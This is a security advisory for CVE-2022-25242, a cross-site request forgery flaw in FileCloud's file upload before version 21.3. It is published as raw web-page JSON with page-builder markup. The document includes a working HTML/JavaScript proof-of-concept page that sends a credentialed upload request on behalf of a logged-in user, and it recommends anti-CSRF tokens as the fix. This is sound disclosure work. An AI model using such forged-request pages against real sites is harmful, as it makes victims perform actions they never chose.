{"id":18005,"date":"2022-04-14T10:43:30","date_gmt":"2022-04-14T08:43:30","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=18005"},"modified":"2022-04-26T13:35:51","modified_gmt":"2022-04-26T11:35:51","slug":"usd-2021-0029","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2021-0029\/","title":{"rendered":"usd-2021-0029"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2021-0029 (CVE-2022-25242) | FileCloud<\/h1>\n

Advisory ID<\/strong>: usd-2021-0029
CVE ID<\/strong>: CVE-2022-25242
<\/em>CVE URL<\/strong>: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2022-25242<\/a>
Affected Product<\/strong>: FileCloud
Affected Versions<\/strong>: <\u00a021.3
Vulnerability Type<\/strong>: CWE-352<\/a>: Cross-Site Request Forgery (CSRF)
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/www.filecloud.com\/<\/a>\u00a0<\/a>
Vendor Status<\/strong>: Fixed<\/p>\n

<\/span><\/p>\n

Description<\/h3>\n

FileCloud<\/em>'s CSV file upload functionality prior v21.3 is vulnerable to Cross-Site Request Forgery (CSRF).<\/p>\n

A Cross-Site Request Forgery (CSRF) attack leads to the execution of unwanted actions in a web application on behalf of a user, who is already logged into the application. When uploading files, the application does not validate an anti-CSRF token. Thus, the request for this functionality can be used for CSRF attacks to force an authenticated user to upload files into their storage.\u00a0<\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

The following screenshot shows the application in its initial state. No files were uploaded by the user at this point.<\/p>\n

[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/filecloud_csrf_fileupload_1.png\" title_text=\"filecloud_csrf_fileupload_1\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<\/p>\n

An attacker can construct a web page containing a button with the following HTML code. When this button is clicked by a user with a valid session in FileCloud<\/em>, a request is executed on behalf of this user and a test file is uploaded without them noticing.<\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" global_colors_info=\"{}\"]<\/p>\n

<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '\/')<\/script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open(\"POST\", \"http:\\\/\\\/localhost\\\/upload?appname=explorer&filesize=19&path=%2Ftest&uploadpath=&offset=0&date=2021-10-14T14:39:13.000Z&filename=file.txt&complete=1\", true);
xhr.setRequestHeader(\"Accept\", \"application\\\/json, text\\\/plain, *\\\/*\");
xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");
xhr.setRequestHeader(\"Content-Type\", \"multipart\\\/form-data; boundary=---------------------------28669891251189313403517665446\");
xhr.withCredentials = true;
var body = \"-----------------------------28669891251189313403517665446\\r\\n\" +
\"Content-Disposition: form-data; name=\\\"filedata\\\"; filename=\\\"file.txt\\\"\\r\\n\" +
\"Content-Type: text\/plain\\r\\n\" +
\"\\r\\n\" +
\"File was uploaded!\\n\" +
\"\\r\\n\" +
\"-----------------------------28669891251189313403517665446--\\r\\n\";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
<\/script>
<form action=\"#\">
<input type=\"button\" value=\"Submit request\" onclick=\"submitRequest();\" \/>
<\/form>
<\/body>
<\/html><\/pre>\n
[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<\/p>\n
The web page generated by the attacker can be displayed in an arbitrary style. The following screenshot shows what this page would look like:<\/p>\n
[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/filecloud_csrf_fileupload_2.png\" title_text=\"filecloud_csrf_fileupload_2\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<\/p>\n
When a user clicks on the button, a fileupload to FileCloud is performed. The following request will be sent to the server. It is noticeable that there is no anti-CSRF token in the header.<\/p>\n
[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/filecloud_csrf_fileupload_3.png\" title_text=\"filecloud_csrf_fileupload_3\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<\/p>\n
The file has been successfully uploaded to the user's share, as displayed in the screenshot below:<\/p>\n
[\/et_pb_text][et_pb_image src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2022\/02\/filecloud_csrf_fileupload_4.png\" title_text=\"filecloud_csrf_fileupload_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][\/et_pb_image][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n
\n
\n
Fix<\/h3>\n
It is recommended to secure every user action using an anti-CSRF token. Such a token consists of a pseudorandom value which is transmitted with every user request using a hidden field. Upon arrival of a new user request the server validates the anti-CSRF token. The user request is then processed only in case of a successful token validation. Such a token has to be generated at least once for every user session.<\/p>\n
<\/h3>\n
References<\/h3>\n